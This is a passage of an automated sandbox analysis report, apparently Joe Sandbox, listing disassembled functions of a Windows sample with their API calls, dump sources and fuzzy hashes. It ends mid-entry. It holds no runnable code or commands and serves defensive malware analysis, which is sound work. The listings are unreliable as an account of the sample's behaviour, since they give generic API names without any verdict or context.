                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B3C8BB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent$_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 313823418-1403004172
                          • Opcode ID: 2949ba0bbcf769e6b97f1c7f4aeba4cd54b282338febe5469a124017769ec5ae
                          • Instruction ID: 1c5bee7337c4396d9693be94f8029711a147341ee669ff17ec6db3a4353fdfe8
                          • Opcode Fuzzy Hash: 2949ba0bbcf769e6b97f1c7f4aeba4cd54b282338febe5469a124017769ec5ae
                          • Instruction Fuzzy Hash: C021B071A00208BBDF01ABA4CC85EFEBBB9EF45300F204196F512E31E1EB749915EB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3C8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32 ref: 00B3C8D9
                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00B3C8EE
                          • _wcscmp.LIBCMT ref: 00B3C900
                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B3C97B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ClassMessageNameParentSend_wcscmp
                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                          • API String ID: 1704125052-3381328864
                          • Opcode ID: 1e0c189f45405bc3cb416b62b60de863ad7cb2343518a07813c6df91df3d52d8
                          • Instruction ID: 25258fab54ea8a2178700e946d9c6bff98f3c990b32ce88788854c5f9dff369c
                          • Opcode Fuzzy Hash: 1e0c189f45405bc3cb416b62b60de863ad7cb2343518a07813c6df91df3d52d8
                          • Instruction Fuzzy Hash: 7C11CA76648316BAFA162B74EC0ADA67BECDB17760F310292F904B60E2FFA169014754
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4B05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                          Download Yara Rule
                          APIs
                          • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00B4B137
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ArraySafeVartype
                          • String ID:
                          • API String ID: 1725837607-0
                          • Opcode ID: a2d1b5941b2c36a63e57177c3cafcb9e11c8addde5664c5d36330743e2373012
                          • Instruction ID: 4b1b32ace28cebcb2232b2632bda6882de035861fe54767b11df855109b15a77
                          • Opcode Fuzzy Hash: a2d1b5941b2c36a63e57177c3cafcb9e11c8addde5664c5d36330743e2373012
                          • Instruction Fuzzy Hash: 9AC17B75A0021ADFDB04CF99D481BAEBBF4FF08315F2440AAE615E7291C774EA81DB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B2BA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                          Download Yara Rule
                          APIs
                          • __lock.LIBCMT ref: 00B2BA74
                            • Part of subcall function 00B28984: __mtinitlocknum.LIBCMT ref: 00B28996
                            • Part of subcall function 00B28984: RtlEnterCriticalSection.NTDLL(00B20127), ref: 00B289AF
                          • __calloc_crt.LIBCMT ref: 00B2BA85
                            • Part of subcall function 00B27616: __calloc_impl.LIBCMT ref: 00B27625
                            • Part of subcall function 00B27616: Sleep.KERNEL32(00000000,?,00B20127,?,00B0125D,00000058,?,?), ref: 00B2763C
                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00B2BAA0
                          • GetStartupInfoW.KERNEL32(?,00BB6990,00000064,00B26B14,00BB67D8,00000014), ref: 00B2BAF9
                          • __calloc_crt.LIBCMT ref: 00B2BB44
                          • GetFileType.KERNEL32(00000001), ref: 00B2BB8B
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00B2BBC4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 1426640281-0
                          • Opcode ID: 59cb039769eb344d14a6d733a5bb00f291a90507f655a9181f91b4b8afb168f3
                          • Instruction ID: ac87ce18abfbefd134dd5ad5d2ec39826d5ebc272b146cb7b5f9400870fe040d
                          • Opcode Fuzzy Hash: 59cb039769eb344d14a6d733a5bb00f291a90507f655a9181f91b4b8afb168f3
                          • Instruction Fuzzy Hash: 6081E9719047658FDB14CF68E884AADBBF0EF49324B24429DD46AA73D1CF349843CB55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B508D9 Relevance: 15.2, APIs: 10, Instructions: 196COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPath
                          • String ID:
                          • API String ID: 1801721492-0
                          • Opcode ID: d7690e037d86a846d29db299a7b56b9292cb48ab957ab5cabacdb380015d67d9
                          • Instruction ID: 22d477cff25a335c1cba367290b3849818ef609e7f580fbdffaafbf251bbb4bd
                          • Opcode Fuzzy Hash: d7690e037d86a846d29db299a7b56b9292cb48ab957ab5cabacdb380015d67d9
                          • Instruction Fuzzy Hash: 3671FF75A10119AFDB14EFA8D884ADEB7F8EF48310F0485D6E919A7261DB30EE45CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B47212 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                          Download Yara Rule
                          APIs
                          • __swprintf.LIBCMT ref: 00B47226
                          • __swprintf.LIBCMT ref: 00B47233
                            • Part of subcall function 00B2234B: __woutput_l.LIBCMT ref: 00B223A4
                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00B4725D
                          • LoadResource.KERNEL32(?,00000000), ref: 00B47269
                          • LockResource.KERNEL32(00000000), ref: 00B47276
                          • FindResourceW.KERNEL32(?,?,00000003), ref: 00B47296
                          • LoadResource.KERNEL32(?,00000000), ref: 00B472A8
                          • SizeofResource.KERNEL32(?,00000000), ref: 00B472B7
                          • LockResource.KERNEL32(?), ref: 00B472C3
                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00B47322
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                          • String ID:
                          • API String ID: 1433390588-0
                          • Opcode ID: bf8a0ac82e2394485fc5a2eecf529514a151b78a8e76e8032d024d76a0311dbf
                          • Instruction ID: 3a0fde4f4cabcf91972a36883f488850f36798f59f7292412115e577c47c8fa6
                          • Opcode Fuzzy Hash: bf8a0ac82e2394485fc5a2eecf529514a151b78a8e76e8032d024d76a0311dbf
                          • Instruction Fuzzy Hash: FC31AEB194425AABCF019F60DC89EAB7BE8FF09340B004456F901E3161EB74DA51EBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B44A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00B44A7D
                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B43AD7,?,00000001), ref: 00B44A91
                          • GetWindowThreadProcessId.USER32(00000000), ref: 00B44A98
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B43AD7,?,00000001), ref: 00B44AA7
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B44AB9
                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00B43AD7,?,00000001), ref: 00B44AD2
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B43AD7,?,00000001), ref: 00B44AE4
                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B43AD7,?,00000001), ref: 00B44B29
                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00B43AD7,?,00000001), ref: 00B44B3E
                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00B43AD7,?,00000001), ref: 00B44B49
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                          • String ID:
                          • API String ID: 2156557900-0
                          • Opcode ID: 8a94076a79ce4be7cadbf0b19f54374514ff83b8d8da96df70ff0fde95c26cd4
                          • Instruction ID: 6e0b6be32802c4934bcab50f2e352058a433bb1fc4f1d5314c777d2836bfb194
                          • Opcode Fuzzy Hash: 8a94076a79ce4be7cadbf0b19f54374514ff83b8d8da96df70ff0fde95c26cd4
                          • Instruction Fuzzy Hash: 4131AD71600215BFDB20AF54EC88FBAB7EAEB48721F148446F904D71A0DBB4EE40DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3D978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                          Download Yara Rule
                          APIs
                          • EnumChildWindows.USER32(?,00B3DD46), ref: 00B3DC86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ChildEnumWindows
                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                          • API String ID: 3555792229-1603158881
                          • Opcode ID: 57fc2dd90fa11a2ceae92782fe53d36f639d6851f04d493c9e87e631ab65d3c0
                          • Instruction ID: c76e242eeef04c28b98b4b4b0b0d533cbd2bfe26dfc44a3acdc36657671384a1
                          • Opcode Fuzzy Hash: 57fc2dd90fa11a2ceae92782fe53d36f639d6851f04d493c9e87e631ab65d3c0
                          • Instruction Fuzzy Hash: 48919231A00506EBCB18DF64D4C1BE9FBF5FF04310F6485A9D85AA7191DF70A99ACBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1C24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                          Download Yara Rule
                          APIs
                          • SetWindowLongW.USER32(?,000000EB), ref: 00B1C2D2
                            • Part of subcall function 00B1C697: GetClientRect.USER32(?,?), ref: 00B1C6C0
                            • Part of subcall function 00B1C697: GetWindowRect.USER32(?,?), ref: 00B1C701
                            • Part of subcall function 00B1C697: ScreenToClient.USER32(?,000000FF), ref: 00B1C729
                          • GetDC.USER32 ref: 00B7E006
                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B7E019
                          • SelectObject.GDI32(00000000,00000000), ref: 00B7E027
                          • SelectObject.GDI32(00000000,00000000), ref: 00B7E03C
                          • ReleaseDC.USER32(?,00000000), ref: 00B7E044
                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B7E0CF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                          • String ID: U
                          • API String ID: 4009187628-3372436214
                          • Opcode ID: 676879c6b4e3aef50dc932f34250a337191a4bfe6e00c6fa872373b4115a59b8
                          • Instruction ID: b62db26acc2cfc39d2ac2dadc6292bbcee678740b4a365b5cb17b4b491510b6c
                          • Opcode Fuzzy Hash: 676879c6b4e3aef50dc932f34250a337191a4bfe6e00c6fa872373b4115a59b8
                          • Instruction Fuzzy Hash: E171B231500209DFCF219F64C885AEA7BF5FF49350F1482E9ED6AAA1A6C731C891DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B54C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B54C5E
                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B54C8A
                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00B54CCC
                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B54CE1
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B54CEE
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00B54D1E
                          • InternetCloseHandle.WININET(00000000), ref: 00B54D65
                            • Part of subcall function 00B556A9: GetLastError.KERNEL32(?,?,00B54A2B,00000000,00000000,00000001), ref: 00B556BE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                          • String ID:
                          • API String ID: 1241431887-3916222277
                          • Opcode ID: efd9cd56e1a85db6e422448fe26bdb798b250f8f394765f7604dc6d31a5474d5
                          • Instruction ID: 9119def304a6d3f5835f8599f93b8cbc1ecf84613270a2bbd138fb20320b724a
                          • Opcode Fuzzy Hash: efd9cd56e1a85db6e422448fe26bdb798b250f8f394765f7604dc6d31a5474d5
                          • Instruction Fuzzy Hash: 32416FB5501618BFEB129F50CC85FFA77ECEB48315F1041A6FE019A191DB709D888BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1B86E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B049CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B04954,00000000), ref: 00B04A23
                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00B1B85B), ref: 00B1B926
                          • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00B1B85B,00000000,?,?,00B1AF1E,?,?), ref: 00B1B9BD
                          • DestroyAcceleratorTable.USER32(00000000), ref: 00B7E775
                          • DeleteObject.GDI32(00000000), ref: 00B7E7EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                          • String ID:
                          • API String ID: 2402799130-0
                          • Opcode ID: 5f716ab57ec31c28a298397fa4fb1357055fe3d5babe94f6e8bafe73387cc9b4
                          • Instruction ID: a9ba4c9c1d6e1aca577bbf6775378aaba7f1b321d85d177096ab7e9512b535f7
                          • Opcode Fuzzy Hash: 5f716ab57ec31c28a298397fa4fb1357055fe3d5babe94f6e8bafe73387cc9b4
                          • Instruction Fuzzy Hash: 0B61B930104601CFDB25AF29D888F65BBF5FF4A351F5049AEE1AA975B1CB70E881DB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6B14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                          Download Yara Rule
                          APIs
                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B6B204
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: InvalidateRect
                          • String ID:
                          • API String ID: 634782764-0
                          • Opcode ID: e611916f3ab4d04f236cf6a340f8fe5c72c1ff7b19b839c23cad66e148b844ce
                          • Instruction ID: 8d203a302485a9273278d107e2348abd615c11b00c3c899e35e1a8560e6b0556
                          • Opcode Fuzzy Hash: e611916f3ab4d04f236cf6a340f8fe5c72c1ff7b19b839c23cad66e148b844ce
                          • Instruction Fuzzy Hash: 1C518031610204BEEF24AF288C95F9E7BF5EB06350F204196F515E72A1DB79E9D0CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1A599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B7E9EA
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B7EA0B
                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B7EA20
                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B7EA3D
                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B7EA64
                          • DestroyCursor.USER32(00000000), ref: 00B7EA6F
                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B7EA8C
                          • DestroyCursor.USER32(00000000), ref: 00B7EA97
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CursorDestroyExtractIconImageLoadMessageSend
                          • String ID:
                          • API String ID: 3992029641-0
                          • Opcode ID: 3c29a105b358c20eed59c89b954cd349bcaab0c90619b5efb4646b0dfc441f79
                          • Instruction ID: 0630148062b7c0bbff97c73e38d383f373a6512309fc3e02120433a9bcaf9a1a
                          • Opcode Fuzzy Hash: 3c29a105b358c20eed59c89b954cd349bcaab0c90619b5efb4646b0dfc441f79
                          • Instruction Fuzzy Hash: 49514A70604205AFDB20DF68CC81FAA7BF5EF58750F104599F966972E0DB70E990DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1F6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B7E9A0,00000004,00000000,00000000), ref: 00B1F737
                          • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00B7E9A0,00000004,00000000,00000000), ref: 00B1F77E
                          • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00B7E9A0,00000004,00000000,00000000), ref: 00B7EB55
